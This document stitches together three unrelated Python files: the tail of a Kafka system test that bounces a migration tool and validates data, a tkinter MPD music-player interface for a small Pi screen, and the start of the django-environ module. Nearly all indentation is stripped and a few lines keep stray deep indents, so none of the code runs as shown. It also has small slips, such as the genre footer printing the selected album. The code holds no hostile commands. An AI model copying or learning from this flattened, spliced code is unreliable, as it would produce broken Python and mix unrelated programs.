bouncedEntityDownTimeSec = 1
                try:
                    bouncedEntityDownTimeSec = int(self.testcaseEnv.testcaseArgumentsDict["bounced_entity_downtime_sec"])
                except (KeyError, ValueError):  # keep the 1s default when unspecified or malformed
                    pass
while i <= numIterations:
self.log_message("Iteration " + str(i) + " of " + str(numIterations))
# =============================================
# Bounce Migration Tool
# =============================================
bounceMigrationTool = self.testcaseEnv.testcaseArgumentsDict["bounce_migration_tool"]
self.log_message("bounce_migration_tool flag : " + bounceMigrationTool)
if (bounceMigrationTool.lower() == "true"):
clusterConfigList = self.systemTestEnv.clusterEntityConfigDictList
migrationToolEntityIdList = system_test_utils.get_data_from_list_of_dicts(
clusterConfigList, "role", "migration_tool", "entity_id")
stoppedMigrationToolEntityId = migrationToolEntityIdList[0]
migrationToolPPid = self.testcaseEnv.entityMigrationToolParentPidDict[stoppedMigrationToolEntityId]
self.log_message("stopping migration tool : " + migrationToolPPid)
kafka_system_test_utils.stop_remote_entity(self.systemTestEnv, stoppedMigrationToolEntityId, migrationToolPPid)
self.anonLogger.info("sleeping for " + str(bouncedEntityDownTimeSec) + " sec")
time.sleep(bouncedEntityDownTimeSec)
                        # restart the previously terminated migration tool
self.log_message("starting the previously terminated migration tool")
kafka_system_test_utils.start_migration_tool(self.systemTestEnv, self.testcaseEnv, stoppedMigrationToolEntityId)
self.anonLogger.info("sleeping for 15s")
time.sleep(15)
i += 1
# while loop
# =============================================
# tell producer to stop
# =============================================
self.testcaseEnv.lock.acquire()
self.testcaseEnv.userDefinedEnvVarDict["stopBackgroundProducer"] = True
time.sleep(1)
self.testcaseEnv.lock.release()
time.sleep(1)
# =============================================
# wait for producer thread's update of
# "backgroundProducerStopped" to be "True"
# =============================================
while 1:
self.testcaseEnv.lock.acquire()
self.logger.info("status of backgroundProducerStopped : [" + \
str(self.testcaseEnv.userDefinedEnvVarDict["backgroundProducerStopped"]) + "]", extra=self.d)
if self.testcaseEnv.userDefinedEnvVarDict["backgroundProducerStopped"]:
time.sleep(1)
self.testcaseEnv.lock.release()
self.logger.info("all producer threads completed", extra=self.d)
break
time.sleep(1)
self.testcaseEnv.lock.release()
time.sleep(2)
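                # Summary of the handshake above (as implemented here): this
                # thread raises "stopBackgroundProducer" under the shared lock;
                # the producer thread is expected to notice it, finish up, and
                # set "backgroundProducerStopped", which the polling loop waits
                # for before the consumer is started.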
#print "\n\n#### sleeping for 30 min ...\n\n"
#time.sleep(1800)
# =============================================
# starting consumer
# =============================================
self.log_message("starting consumer in the background")
kafka_system_test_utils.start_console_consumer(self.systemTestEnv, self.testcaseEnv)
self.anonLogger.info("sleeping for 20s")
time.sleep(20)
# =============================================
# this testcase is completed - stop all entities
# =============================================
self.log_message("stopping all entities")
for entityId, parentPid in self.testcaseEnv.entityBrokerParentPidDict.items():
kafka_system_test_utils.stop_remote_entity(self.systemTestEnv, entityId, parentPid)
for entityId, parentPid in self.testcaseEnv.entityZkParentPidDict.items():
kafka_system_test_utils.stop_remote_entity(self.systemTestEnv, entityId, parentPid)
# make sure all entities are stopped
kafka_system_test_utils.ps_grep_terminate_running_entity(self.systemTestEnv)
# =============================================
# collect logs from remote hosts
# =============================================
kafka_system_test_utils.collect_logs_from_remote_hosts(self.systemTestEnv, self.testcaseEnv)
# =============================================
# validate the data matched and checksum
# =============================================
self.log_message("validating data matched")
kafka_system_test_utils.validate_data_matched(self.systemTestEnv, self.testcaseEnv, replicationUtils)
kafka_system_test_utils.validate_broker_log_segment_checksum(self.systemTestEnv, self.testcaseEnv)
# =============================================
# draw graphs
# =============================================
metrics.draw_all_graphs(self.systemTestEnv.METRICS_PATHNAME,
self.testcaseEnv,
self.systemTestEnv.clusterEntityConfigDictList)
# build dashboard, one for each role
metrics.build_all_dashboards(self.systemTestEnv.METRICS_PATHNAME,
self.testcaseEnv.testCaseDashboardsDir,
self.systemTestEnv.clusterEntityConfigDictList)
except Exception as e:
self.log_message("Exception while running test {0}".format(e))
traceback.print_exc()
finally:
if not skipThisTestCase and not self.systemTestEnv.printTestDescriptionsOnly:
self.log_message("stopping all entities - please wait ...")
kafka_system_test_utils.stop_all_remote_running_processes(self.systemTestEnv, self.testcaseEnv)
|
|
#!/usr/bin/env python3
import tkinter, mpd, configparser, subprocess, sys
from tkinter import Listbox, Label, Canvas, Frame, Y, X
from PIL import Image, ImageTk, ImageColor
from subprocess import call
from pathlib import Path
root = tkinter.Tk()
root.geometry("320x240")
client = mpd.MPDClient(use_unicode=True)
config = configparser.ConfigParser()
config.read('config.ini')
theme_name = config["THEME"]["theme"]
theme = configparser.ConfigParser()
theme.read('./theme/' + theme_name + '/theme.ini')
icon_random = None
icon_repeat = None
icon_single = None
status = {}
queue = []
playlists = []
artists = []
albums = []
genres = []
songs = []
themes = []
selectedAlbum = ''
selectedArtist = ''
selectedGenre = ''
currentSong = None
keyMode = 'MENU'
textEntry = ''
textBackAction = ''
textSaveAction = ''
image = None
bg = None
awayCount = 0
footerMessage = ''
footerMessageCount = 0
minTickerLength = 30
songName = ''
songChanged = False
songTicker = False
songTickerCount = 0
volumeChanged = False
class PiScreen(tkinter.Frame):
def __init__(self, master: 'tkinter.Tk'):
global client, status, theme
# host = '192.168.1.120'
host = 'localhost'
if sys.platform.startswith('linux'):
host = 'localhost'
client.connect(host, 6600)
tkinter.Frame.__init__(self, master, padx=0, pady=0)
self.pack()
self.place(height=240, width=320, x=0, y=0)
status = client.status()
self.volume = int(status["volume"])
self.screen_data = {
"1": ["QUEUE", "PLAYLISTS", "LIBRARY", "SETUP", "CLEAR PLAYLIST", "RANDOM " + status['random'],
"REPEAT " + status['repeat'], "SINGLE " + status['single'], "CONSUME " + status['consume']],
"1.1": {"ACTION": "QUEUE"},
"1.2": {"ACTION": "PLAYLISTS"},
"1.3": ["ARTISTS", "ALBUMS", "GENRES"],
"1.3.1": {"ACTION": "ARTISTS"},
"1.3.2": {"ACTION": "ALBUMS"},
"1.3.3": {"ACTION": "GENRES"},
"1.4": ["UPDATE LIBRARY", "THEMES"],
"1.4.1": {"ACTION": "UPDATE_LIBRARY"},
"1.4.2": {"ACTION": "THEMES"},
"1.5": {"ACTION": "CLEAR"},
"1.6": {"ACTION": "RANDOM"},
"1.7": {"ACTION": "REPEAT"},
"1.8": {"ACTION": "SINGLE"},
"1.9": {"ACTION": "CONSUME"}
}
self.screen_format = {
"1.Q": "SONG",
"1.P": "PLAYLIST"
}
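# The menu is modelled as a tree of dotted keys: "1" is the root menu and
# "1.3.2" is the second entry of the third submenu. handle_keys() descends
# by appending ".<selection>" to self.screen and ascends by rsplitting on
# ".". An illustrative walk (key names are examples, not bindings):
#   screen "1"   -> ok on item 3 -> screen "1.3" (LIBRARY submenu)
#   screen "1.3" -> ok on item 1 -> runs ACTION "ARTISTS"
#   any screen   -> back         -> parent screen, or the player at the root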
self.current_song_var = tkinter.StringVar()
self.footer_text_var = tkinter.StringVar()
# Screens
self.playerScreen = Canvas(self, width=320, height=240, bg=theme['PLAYER']['background'], borderwidth=0,
highlightthickness=0)
self.menuScreen = Frame(self, width=320, height=240, bg="white")
self.menuScreen.place(height=240, width=320, x=0, y=0)
# Menu Screen items
self.headerFrame = Frame(self.menuScreen, width=320, height=20, bg=theme['HEADER']['background'])
self.headerFrame.pack(side=tkinter.TOP, fill=X)
self.currentSongLabel = Label(self.headerFrame, font=(theme['HEADER']['font'], 12, 'bold'),
bg=theme['HEADER']['background'], foreground=theme['HEADER']['foreground'],
textvariable=self.current_song_var, justify=tkinter.LEFT, anchor=tkinter.W)
self.currentSongLabel.place(x=0, y=0, width=300, height=20, anchor=tkinter.NW)
self.volumeLabel = Label(self.headerFrame, font=(theme['HEADER']['font'], 10, 'bold'),
bg=theme['HEADER']['background'], foreground=theme['HEADER']['foreground'], text='')
self.volumeLabel.place(x=300, y=0, anchor=tkinter.NW)
self.mainFrame = Frame(self.menuScreen, width=320, height=200)
self.mainFrame.pack(side=tkinter.TOP, fill=Y)
self.listbox = Listbox(self.mainFrame, selectmode=tkinter.SINGLE, font=(theme['MAIN']['font'], 11),
bg=theme['MAIN']['background'],
fg=theme['MAIN']['foreground'], height=10, activestyle="none", borderwidth=0,
highlightthickness=0, selectbackground=theme['MAIN']['selected'],
selectforeground=theme['MAIN']['foreground'])
self.listbox.bind("<Key>", self.handle_keys)
self.listbox.configure(width=320, height=11)
self.listbox.pack(side=tkinter.TOP, expand=1, ipadx=0, ipady=0, padx=0, pady=0)
self.listbox.focus_set()
self.footer = Label(self.menuScreen, textvariable=self.footer_text_var,
font=(theme['FOOTER']['font'], 10, 'bold'), bg=theme['FOOTER']['background'],
foreground=theme['FOOTER']['foreground'], justify=tkinter.LEFT, anchor=tkinter.W)
self.footer.configure(width=320, height=1)
self.footer.pack(side=tkinter.BOTTOM)
self.focus_set()
self.bind("<Key>", self.handle_keys)
self.screen = "1"
self.show_screen()
self.tick()
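# tick() re-runs itself every 800 ms: it refreshes the header, falls back to
# the player view after 120 idle ticks (~96 s) outside PLAYER mode, and
# clears a footer message once it has been visible for 8 ticks (~6.4 s).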
def tick(self):
global awayCount, keyMode, footerMessage, footerMessageCount
self.update_header()
if keyMode != 'PLAYER':
awayCount += 1
if awayCount > 120:
awayCount = 0
self.screen = ''
self.show_screen()
else:
awayCount = 0
if footerMessage == self.footer_text_var.get():
footerMessageCount += 1
if footerMessageCount > 8:
footerMessageCount = 0
self.footer_text_var.set("")
else:
footerMessage = self.footer_text_var.get()
footerMessageCount = 0
self.after(800, self.tick)
def update_header(self):
global status, keyMode, songChanged, currentSong, songName, songTicker, minTickerLength, songTickerCount
status = client.status()
self.volume = int(status["volume"])
self.volumeLabel.configure(text=status["volume"])
if status["state"] == "play":
currentSong = client.currentsong()
song = currentSong["artist"] + " - " + currentSong["title"]
if songName != song:
songChanged = True
songName = song
if keyMode != 'PLAYER': # song changed, refresh ui
if len(songName) >= minTickerLength:
songTicker = True
songTickerCount = -1
else:
songTicker = False
songTickerCount = 0
if keyMode != 'PLAYER':
if songTicker:
songTickerCount += 1
if songTickerCount == len(songName) + 5:
songTickerCount = 0
song = songName + " "
new_song = song[songTickerCount:] + song[:songTickerCount]
self.current_song_var.set(new_song)
elif keyMode == 'PLAYER':
self.show_player()
else:
if songName != '':
self.current_song_var.set('')
songName = ''
songChanged = True
if keyMode == 'PLAYER':
self.show_player()
def show_screen(self):
global keyMode
if self.screen == '':
keyMode = 'PLAYER'
self.menuScreen.place_forget()
self.playerScreen.place(height=240, width=320, x=0, y=0)
self.show_player()
self.update()
self.screen = '1'
return
self.listbox.delete(0, self.listbox.size() - 1)
format_name = "string"
if self.screen in self.screen_format:
format_name = self.screen_format[self.screen]
if isinstance(self.screen_data[self.screen], list):
for item in self.screen_data[self.screen]:
if format_name == "string":
if not item:
self.listbox.insert(tkinter.END, "")
else:
self.listbox.insert(tkinter.END, item[:36])
if format_name == "SONG":
songname = ''
if 'artist' in item:
songname = item['artist'][:18]
songname += " - "
if 'title' in item:
remaining = 36 - len(songname)
songname += item['title'][:remaining]
self.listbox.insert(tkinter.END, songname)
if format_name == "PLAYLIST":
playlist_name = ''
if isinstance(item, str):
playlist_name = item
else:
playlist_name = item['playlist']
self.listbox.insert(tkinter.END, playlist_name)
self.listbox.select_set(0)  # select the first item by default
self.listbox.event_generate("<<ListboxSelect>>")
self.update()
return
def show_player(self):
global image, bg, songChanged, volumeChanged
if songChanged or image is None:
if sys.platform.startswith('linux'):
# coverart.sh prints the path of the current song's cover image
cover_path = subprocess.check_output("./coverart.sh", shell=True).decode().strip()
else:
cover_path = "./icons/ic_album_white_48dp.png"
image = ImageTk.PhotoImage(Image.open(cover_path).resize((136, 136), Image.ANTIALIAS))
if bg is None:
bg_path = "./icons/bg.png"
if 'img_background' in theme['PLAYER']:
bg_path = theme['PLAYER']['img_background']
bg = ImageTk.PhotoImage(Image.open(bg_path).resize((320, 240), Image.ANTIALIAS))
if icon_random is None:
self.load_icons()
if status["state"] == "play":
if songChanged:
self.playerScreen.delete(tkinter.ALL)
self.playerScreen.create_image(160, 120, image=bg)
self.playerScreen.create_rectangle(10, 10, 150, 150, fill=theme['PLAYER']['foreground'])
self.playerScreen.create_image(80, 80, image=image)
self.playerScreen.create_image(178, 132, image=icon_random)
self.playerScreen.create_image(224, 132, image=icon_repeat)
self.playerScreen.create_image(270, 132, image=icon_single)
self.playerScreen.create_rectangle(298, 146, 308, 92, fill=theme['PLAYER']['background'],
outline=theme['PLAYER']['foreground'], width=1)
self.playerScreen.create_line(303, 144, 303, 144 - int(self.volume / 2),
fill=theme['PLAYER']['foreground'], width=7)
self.playerScreen.create_text(10, 160, text=currentSong['artist'], anchor=tkinter.NW,
fill=theme['PLAYER']['foreground'],
font=(theme['PLAYER']['font'], 14, 'bold'))
self.playerScreen.create_text(10, 185, text=currentSong['title'], anchor=tkinter.NW,
fill=theme['PLAYER']['foreground'],
font=(theme['PLAYER']['font'], 12, 'bold'))
self.playerScreen.create_text(10, 210, text=currentSong['album'], anchor=tkinter.NW,
fill=theme['PLAYER']['foreground'],
font=(theme['PLAYER']['font'], 10, 'bold'))
else:
time = str(status['time']).split(":")
played = int((float(time[0]) / float(time[1])) * 320)
if played < 3:  # song just (re)started: clear the previous progress bar
self.playerScreen.create_rectangle(0, 236, 320, 240, fill=theme['PLAYER']['background'])
self.playerScreen.create_rectangle(0, 236, played, 240, fill=theme['PLAYER']['foreground'])
if volumeChanged:
volumeChanged = False
self.playerScreen.create_rectangle(298, 146, 308, 92, fill=theme['PLAYER']['background'],
outline=theme['PLAYER']['foreground'], width=1)
self.playerScreen.create_line(303, 144, 303, 144 - int(self.volume / 2),
fill=theme['PLAYER']['foreground'],
width=7)
else: # Blank Screen
self.playerScreen.delete(tkinter.ALL)
self.playerScreen.create_image(160, 120, image=bg)
self.playerScreen.create_text(20, 20, text=theme['PLAYER']['default_message'], anchor=tkinter.NW,
fill=theme['PLAYER']['foreground'],
font=(theme['PLAYER']['font'], 20, 'bold'))
songChanged = False
return
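# Key handling below is a small state machine driven by the global keyMode:
#   'MENU'   - arrows move the listbox selection; right/ok descends into a
#              submenu or runs its ACTION; left/back ascends (to the player
#              from the root menu)
#   'PLAYER' - any key other than the transport/volume/power keys drops back
#              to 'MENU'
#   'TEXT'   - keysyms are appended to textEntry until back or ok triggers
#              textBackAction / textSaveAction (used for playlist save/delete)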
def handle_keys(self, event):
global config, client, selectedAlbum, selectedArtist, selectedGenre
global keyMode, textEntry, textBackAction, textSaveAction, awayCount, theme_name
global albums, artists, queue, songs, playlists, status, genres, songChanged, volumeChanged
awayCount = 0
keycode = str(event.keycode)
# self.footer_text_var.set(str("Key Pressed : "+keycode))
if keyMode == 'PLAYER' and keycode != config["PISCREEN_KEYS"]["vol_up"] \
and keycode != config["PISCREEN_KEYS"]["vol_down"] \
and keycode != config["PISCREEN_KEYS"]["play"] \
and keycode != config["PISCREEN_KEYS"]["next"] \
and keycode != config["PISCREEN_KEYS"]["prev"] \
and keycode != config["PISCREEN_KEYS"]["power"] \
and keycode != config["PISCREEN_KEYS"]["left"]:
keyMode = 'MENU'
self.playerScreen.place_forget()
self.menuScreen.place(height=240, width=320, x=0, y=0)
self.show_screen()
self.update()
return
if keyMode == 'TEXT':
if keycode == config["PISCREEN_KEYS"]["back"]: # back
keyMode = 'MENU'
self.run_command(textBackAction)
if keycode == config["PISCREEN_KEYS"]["ok"]: # ok
keyMode = 'MENU'
self.run_command(textSaveAction)
if len(event.keysym) == 1 and event.keysym in '0123456789-abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ':
textEntry += event.keysym
self.footer_text_var.set(str("Entry : " + textEntry))
return
# self.footer.configure(text=str('Key Pressed ' + str(event.keycode)))
if keycode == config["PISCREEN_KEYS"]["menu"]:
if self.screen == "1.P":
selection = int(self.listbox.curselection()[0]) + 1
if selection > 1:
self.footer_text_var.set(str("Press 1 + OK to Delete Playlist"))
keyMode = 'TEXT'
textBackAction = "PLAYLISTS"
textSaveAction = "DELETE_PLAYLIST"
if self.screen == "1.Q":
self.footer_text_var.set(str("Press OK to remove Song"))
keyMode = 'TEXT'
textBackAction = "QUEUE"
textSaveAction = "DELETE_SONG"
return
if keycode == config["PISCREEN_KEYS"]["down"]: # down
if self.listbox.size() > 0:
selection = int(self.listbox.curselection()[0])
count = self.listbox.size()
if selection < (count - 1):
self.listbox.select_clear(selection)
self.listbox.selection_set(selection + 1)
self.listbox.event_generate("<<ListboxSelect>>")
return
if keycode == config["PISCREEN_KEYS"]["up"]: # up
if self.listbox.size() > 0:
selection = int(self.listbox.curselection()[0])
if selection > 0:
self.listbox.select_clear(selection)
self.listbox.selection_set(selection - 1)
self.listbox.event_generate("<<ListboxSelect>>")
return
if keycode == config["PISCREEN_KEYS"]["left"] or keycode == config["PISCREEN_KEYS"]["back"]: # left or escape
if self.screen != "1":
menu = self.screen.rsplit(".", maxsplit=1)
new_screen = menu[0]
self.screen = new_screen
self.show_screen()
else:
self.screen = ''
songChanged = True
self.show_screen()
return
if keycode == config["PISCREEN_KEYS"]["right"] or keycode == config["PISCREEN_KEYS"]["ok"]: # right or return
if self.listbox.size() > 0:
selection = int(self.listbox.curselection()[0]) + 1
new_screen = self.screen + "." + str(selection)
if new_screen in self.screen_data:
if type(self.screen_data[new_screen]) is list:
self.screen = new_screen
self.show_screen()
else:
self.run_command(self.screen_data[new_screen]["ACTION"])
else:
if str(new_screen).startswith("1.Q."):
menu = new_screen.rsplit(".", maxsplit=1)
client.playid(int(queue[int(menu[1]) - 1]["id"]))
return
if str(new_screen).startswith("1.P."):
menu = new_screen.rsplit(".", maxsplit=1)
if menu[1] == "1":
keyMode = 'TEXT'
textBackAction = 'PLAYLISTS'
textSaveAction = 'SAVE_PLAYLIST'
textEntry = ''
self.footer_text_var.set('Back to Cancel, Ok to Save')
else:
playlist = playlists[int(menu[1]) - 1]['playlist']
client.clear()
client.load(playlist)
client.play()
return
if str(new_screen).startswith("1.3.A"):
if new_screen.count(".") == 3:
menu = new_screen.rsplit(".", maxsplit=1)
selectedArtist = artists[int(menu[1]) - 1]
albums = []
albums = client.list("album", selectedArtist)
albums[:0] = ["Add All"]
self.footer_text_var.set("SELECTED Artist " + selectedArtist)
self.screen = new_screen
self.screen_data[new_screen] = albums
self.show_screen()
return
elif new_screen.count(".") == 4:
menu = new_screen.rsplit(".", maxsplit=1)
if menu[1] == "1": # add all
client.findadd("artist", selectedArtist)
self.footer_text_var.set("Added All for " + selectedArtist)
self.screen = menu[0].rsplit(".", maxsplit=1)[0]
self.show_screen()
else:
selectedAlbum = albums[int(menu[1]) - 1]
songs = client.list("title", "album", selectedAlbum, "artist", selectedArtist)
songs[:0] = ["Add All"]
self.screen = new_screen
self.screen_data[new_screen] = songs
self.show_screen()
self.footer_text_var.set("Album Selected " + selectedAlbum)
return
elif new_screen.count(".") == 5:
menu = new_screen.rsplit(".", maxsplit=1)
if menu[1] == "1": # add all
client.findadd("album", selectedAlbum, "artist", selectedArtist)
self.footer_text_var.set("Added All for " + selectedAlbum + "/" + selectedArtist)
self.screen = menu[0].rsplit(".", maxsplit=1)[0]
self.show_screen()
else:
selected_song = songs[int(menu[1]) - 1]
client.findadd("title", selected_song, "album", selectedAlbum, "artist", selectedArtist)
self.footer_text_var.set(
"Added " + selected_song + "/" + selectedAlbum + "/" + selectedArtist)
return
if str(new_screen).startswith("1.3.B"):
menu = new_screen.rsplit(".", maxsplit=1)
if new_screen.count(".") == 3:
selectedAlbum = albums[int(menu[1]) - 1]
songs = client.list("title", "album", selectedAlbum)
songs[:0] = ["Add All"]
self.screen = new_screen
self.screen_data[new_screen] = songs
self.show_screen()
self.footer_text_var.set("Album Selected " + selectedAlbum)
if new_screen.count(".") == 4:
if menu[1] == "1": # add all
client.findadd("album", selectedAlbum)
self.footer_text_var.set("Added All for album " + selectedAlbum)
self.screen = menu[0].rsplit(".", maxsplit=1)[0]
self.show_screen()
else:
selected_song = songs[int(menu[1]) - 1]
client.findadd("title", selected_song, "album", selectedAlbum)
self.footer_text_var.set("Added " + selected_song + "/" + selectedAlbum)
return
if str(new_screen).startswith("1.3.C"):
menu = new_screen.rsplit(".", maxsplit=1)
if new_screen.count(".") == 3:
selectedGenre = genres[int(menu[1]) - 1]
songs = client.list("title", "genre", selectedGenre)
self.screen = new_screen
self.screen_data[new_screen] = songs
self.show_screen()
self.footer_text_var.set("Genre Selected " + selectedAlbum)
if new_screen.count(".") == 4:
selected_song = songs[int(menu[1]) - 1]
client.findadd("title", selected_song, "genre", selectedGenre)
self.footer_text_var.set("Added " + selected_song + selectedGenre)
return
if str(new_screen).startswith("1.4.T"):
menu = new_screen.rsplit(".", maxsplit=1)
theme_name = themes[int(menu[1]) - 1]
self.footer_text_var.set("Applying Theme " + theme_name)
self.apply_theme()
return
if keycode == config["PISCREEN_KEYS"]["vol_up"]:
if self.volume < 100:
self.volume += 1
client.setvol(self.volume)
volumeChanged = True
self.footer_text_var.set("Volume Up")
else:
self.footer_text_var.set("Volume Max!!")
return
if keycode == config["PISCREEN_KEYS"]["vol_down"]:
if self.volume > 0:
self.volume -= 1
client.setvol(self.volume)
volumeChanged = True
self.footer_text_var.set("Volume Down")
else:
self.footer_text_var.set("Volume Zero!!")
return
if keycode == config["PISCREEN_KEYS"]["play"]:
if status["state"] == "play":
client.pause()
self.footer_text_var.set("Paused")
else:
client.play()
self.footer_text_var.set("Playing")
return
if keycode == config["PISCREEN_KEYS"]["next"]:
client.next()
self.footer_text_var.set("Next Song")
return
if keycode == config["PISCREEN_KEYS"]["prev"]:
client.previous()
self.footer_text_var.set("Previous Song")
return
if keycode == config["PISCREEN_KEYS"]["home"]:
self.screen = ''
self.show_screen()
return
if keycode == config["PISCREEN_KEYS"]["power"]:
if sys.platform.startswith('linux'):
call("sudo nohup shutdown -h now", shell=True)
else:
self.footer_text_var.set("Can't PowerOff from remote")
return
self.footer_text_var.set("UNKNOWN " + keycode)
def run_command(self, action):
global client, keyMode, textEntry, status
global albums, artists, queue, songs, playlists, genres, themes
if action == "QUEUE":
local_queue = client.playlistinfo()
queue.clear()
for item in local_queue:
queue.append(item)
self.screen = "1.Q"
self.screen_data["1.Q"] = queue
self.footer_text_var.set("Right to play Song, Menu to delete")
self.show_screen()
elif action == "PLAYLISTS":
playlists = client.listplaylists()
playlists[:0] = ["SAVE PLAYLIST"]
self.screen = "1.P"
self.screen_data["1.P"] = playlists
self.footer_text_var.set("Right to play Playlist, Menu to delete")
self.show_screen()
elif action == "ARTISTS":
artists = client.list("artist")
self.screen = "1.3.A"
self.screen_data["1.3.A"] = artists
self.show_screen()
elif action == "ALBUMS":
albums = client.list("album")
self.screen = "1.3.B"
self.screen_data["1.3.B"] = albums
self.show_screen()
elif action == "GENRES":
genres = client.list("genre")
self.screen = "1.3.C"
self.screen_data["1.3.C"] = genres
self.show_screen()
elif action == "UPDATE_LIBRARY":
self.footer_text_var.set("Updating library")
client.update()
elif action == "THEMES":
self.footer_text_var.set("Select Theme")
themes = ["default", "foofighters", "light"]
self.screen = "1.4.T"
self.screen_data["1.4.T"] = themes
self.show_screen()
elif action == "SAVE_PLAYLIST":
keyMode = 'MENU'
found = False
if textEntry == '':
self.footer_text_var.set("Name Empty!!")
return
for playlist in playlists:
if isinstance(playlist, str) is False and textEntry == playlist['playlist']:
found = True
if found:
client.rm(textEntry)
client.save(textEntry)
else:
client.save(textEntry)
self.footer_text_var.set("Saved Playlist " + textEntry)
textEntry = ''
self.run_command("PLAYLISTS")
elif action == "DELETE_PLAYLIST":
keyMode = 'MENU'
if textEntry == '1':
selection = int(self.listbox.curselection()[0])
client.rm(playlists[selection]['playlist'])
textEntry = ''
self.run_command("PLAYLISTS")
elif action == "DELETE_SONG":
keyMode = 'MENU'
client.delete(int(self.listbox.curselection()[0]))
textEntry = ''
self.run_command("QUEUE")
elif action == "CLEAR":
self.footer_text_var.set("Clearing Queue")
client.clear()
elif action == "RANDOM":
if status['random'] == '0':
client.random('1')
else:
client.random('0')
status = client.status()
self.screen_data['1'][5] = "RANDOM " + status['random']
self.update_random()
self.show_screen()
elif action == "REPEAT":
if status['repeat'] == '0':
client.repeat('1')
else:
client.repeat('0')
status = client.status()
self.screen_data['1'][6] = "REPEAT " + status['repeat']
self.update_repeat()
self.show_screen()
elif action == "SINGLE":
if status['single'] == '0':
client.single('1')
else:
client.single('0')
status = client.status()
self.screen_data['1'][7] = "SINGLE " + status['single']
self.update_single()
self.show_screen()
elif action == "CONSUME":
if status['consume'] == '0':
client.consume('1')
else:
client.consume('0')
status = client.status()
self.screen_data['1'][8] = "CONSUME " + status['consume']
self.show_screen()
self.update()
return
def load_icons(self):
self.update_random()
self.update_repeat()
self.update_single()
def update_random(self):
global status, theme, icon_random
fgcolor = ImageColor.getrgb(theme['PLAYER']['foreground'])
bgcolor = ImageColor.getrgb(theme['PLAYER']['background'])
fgcolor += (255,)
bgcolor += (255,)
icon_random = Image.open('./icons/ic_shuffle_white_36dp.png')
if icon_random.mode != 'RGBA':
icon_random = icon_random.convert('RGBA')
data = list(icon_random.getdata())
newData = list()
for pixel in data:
if pixel[3] != 0:
if status['random'] == '1':
newData.append(fgcolor)
else:
newData.append(bgcolor)
else:
newData.append(pixel)
icon_random.putdata(newData)
icon_random = ImageTk.PhotoImage(icon_random.resize((36, 36), Image.ANTIALIAS))
def update_single(self):
global status, theme, icon_single
fgcolor = ImageColor.getrgb(theme['PLAYER']['foreground'])
bgcolor = ImageColor.getrgb(theme['PLAYER']['background'])
fgcolor += (255,)
bgcolor += (255,)
icon_single = Image.open('./icons/ic_repeat_one_white_36dp.png')
if icon_single.mode != 'RGBA':
icon_single = icon_single.convert('RGBA')
data = list(icon_single.getdata())
newData = list()
for pixel in data:
if pixel[3] != 0:
if status['single'] == '1':
newData.append(fgcolor)
else:
newData.append(bgcolor)
else:
newData.append(pixel)
icon_single.putdata(newData)
icon_single = ImageTk.PhotoImage(icon_single.resize((36, 36), Image.ANTIALIAS))
def update_repeat(self):
global status, theme, icon_repeat
fgcolor = ImageColor.getrgb(theme['PLAYER']['foreground'])
bgcolor = ImageColor.getrgb(theme['PLAYER']['background'])
fgcolor += (255,)
bgcolor += (255,)
icon_repeat = Image.open('./icons/ic_repeat_white_36dp.png')
if icon_repeat.mode != 'RGBA':
icon_repeat = icon_repeat.convert('RGBA')
data = list(icon_repeat.getdata())
newData = list()
for pixel in data:
if pixel[3] != 0:
if status['repeat'] == '1':
newData.append(fgcolor)
else:
newData.append(bgcolor)
else:
newData.append(pixel)
icon_repeat.putdata(newData)
icon_repeat = ImageTk.PhotoImage(icon_repeat.resize((36, 36), Image.ANTIALIAS))
def apply_theme(self):
global theme_name, theme, config, bg
my_file = Path('./theme/' + theme_name + '/theme.ini')
if my_file.is_file():
theme = configparser.ConfigParser()
theme.read('./theme/' + theme_name + '/theme.ini')
# player related settings
bg = None
self.playerScreen.configure(bg=theme['PLAYER']['background'])
self.load_icons()
# menu related settings
self.headerFrame.configure(bg=theme['HEADER']['background'])
self.currentSongLabel.configure(font=(theme['HEADER']['font'], 12, 'bold'),
bg=theme['HEADER']['background'], foreground=theme['HEADER']['foreground'])
self.volumeLabel.configure(font=(theme['HEADER']['font'], 10, 'bold'), bg=theme['HEADER']['background'],
foreground=theme['HEADER']['foreground'])
self.listbox.configure(font=(theme['MAIN']['font'], 11), bg=theme['MAIN']['background'],
fg=theme['MAIN']['foreground'], selectbackground=theme['MAIN']['selected'],
selectforeground=theme['MAIN']['foreground'])
self.footer.configure(font=(theme['FOOTER']['font'], 10, 'bold'), bg=theme['FOOTER']['background'],
foreground=theme['FOOTER']['foreground'])
# write theme to config.ini
config["THEME"]["theme"] = theme_name
with open('config.ini', 'w') as configfile:
config.write(configfile)
else:
self.footer_text_var.set("Theme Not Found")
theme_name = config["THEME"]["theme"]
app = PiScreen(root)
app.mainloop()
|
|
"""
Django-environ allows you to utilize 12factor inspired environment
variables to configure your Django application.
"""
from __future__ import unicode_literals
import os
import sys
import re
import json
import warnings
import logging
logger = logging.getLogger(__file__)
try:
from django.core.exceptions import ImproperlyConfigured
except ImportError:
class ImproperlyConfigured(Exception):
pass
try:
import urllib.parse as urlparse
except ImportError:
# Python 2
import urlparse
if sys.version < '3':
text_type = unicode
else:
text_type = str
basestring = str
__author__ = 'joke2k'
__version__ = (0, 3, 1)
# return int if possible
_cast_int = lambda v: int(v) if isinstance(v, basestring) and v.isdigit() else v
# return str if possible
_cast_str = lambda v: str(v) if isinstance(v, basestring) else v
class NoValue(object):
def __repr__(self):
return '<{0}>'.format(self.__class__.__name__)
class Env(object):
"""Provide schema-based lookups of environment variables so that each
caller doesn't have to pass in `cast` and `default` parameters.
Usage::
env = Env(MAIL_ENABLED=bool, SMTP_LOGIN=(str, 'DEFAULT'))
if env('MAIL_ENABLED'):
...
"""
NOTSET = NoValue()
BOOLEAN_TRUE_STRINGS = ('true', 'on', 'ok', 'y', 'yes', '1')
URL_CLASS = urlparse.ParseResult
DEFAULT_DATABASE_ENV = 'DATABASE_URL'
DB_SCHEMES = {
'postgres': 'django.db.backends.postgresql_psycopg2',
'postgresql': 'django.db.backends.postgresql_psycopg2',
'psql': 'django.db.backends.postgresql_psycopg2',
'pgsql': 'django.db.backends.postgresql_psycopg2',
'postgis': 'django.contrib.gis.db.backends.postgis',
'mysql': 'django.db.backends.mysql',
'mysql2': 'django.db.backends.mysql',
'mysqlgis': 'django.contrib.gis.db.backends.mysql',
'spatialite': 'django.contrib.gis.db.backends.spatialite',
'sqlite': 'django.db.backends.sqlite3',
'ldap': 'ldapdb.backends.ldap',
}
_DB_BASE_OPTIONS = ['CONN_MAX_AGE', 'ATOMIC_REQUESTS', 'AUTOCOMMIT']
